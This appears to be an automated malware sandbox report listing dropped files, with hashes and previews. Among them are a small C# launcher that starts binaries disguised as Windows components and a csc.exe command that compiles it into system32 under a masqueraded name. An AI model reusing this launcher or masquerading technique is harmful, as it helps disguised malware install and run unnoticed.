                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):393
                                                                                  Entropy (8bit):4.942776197794233
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLu5j3iFkD:JNVQIbSfhV7TiFkMSfh0jSFkD
                                                                                  MD5:D5FCFE96B53454B1FBFC3C4DD9B68131
                                                                                  SHA1:7E5BF2C3B9A3FA3AB85F8C1D80DBAEA18D9BBBC0
                                                                                  SHA-256:2F65467D61A402D4769F951F47E669B6AE9826C991897C889BB9095D9F4714DA
                                                                                  SHA-512:2E6D9E9AEBFF97B1D5AA38E199B65D576BA7F7314F9F56DA12571F78EEA42C3D18D4DE84EC09B563DCA12F5EBFFB248C7C3F964C785457E42E398A8190E81898
                                                                                  Malicious:false
                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\LiveKernelReports\RuntimeBroker.exe"); } catch { } }).Start();. }.}.
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):253
                                                                                  Entropy (8bit):5.120081153147471
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fBBVb:Hu7L//TRq79cQnaprb
                                                                                  MD5:4186E5C699D9ADFE6A224B79E99849B2
                                                                                  SHA1:D0436E12D1853164B7F38134880A1CD6EFE5CC97
                                                                                  SHA-256:AFDB89002F820D9106C922929B0A9F5CD92895CB707E9B5A6D6B28BED5810346
                                                                                  SHA-512:47EE6AA0B5C6E7704723D06E544BE4EEDFFB0DE1F0E956B319AA61EF53B24C2549C17C3AEE2B04211CE3EF62A3B721672BB0E8D992A12E9ED0E399FBF0917AC7
                                                                                  Malicious:false
                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.0.cs"
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (335), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):756
                                                                                  Entropy (8bit):5.26091957917823
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:B2MBoMI/u7L//TRq79cQnapraKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:wMjI/un/Vq79tnapraKax5DqBVKVrdFf
                                                                                  MD5:58BE106DD96337A2B2537A2076AD2572
                                                                                  SHA1:D74A827B1086780EE24544213D5BE65C9E532851
                                                                                  SHA-256:34B0C29DD4E11F0C4EAD199FAEC1E970D8F948AF1F7E3972F731AF310312287A
                                                                                  SHA-512:4B3A32756F464FC695E35A32DF831D407530C73576A927390C4FA701C3C04DE24D2AFA14D8BEE71BB4666DEDD7D2200AD5D0EE404AFD417641D61ACDA7E60415
                                                                                  Malicious:false
                                                                                  Preview:.C:\ServerWinRuntimeBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
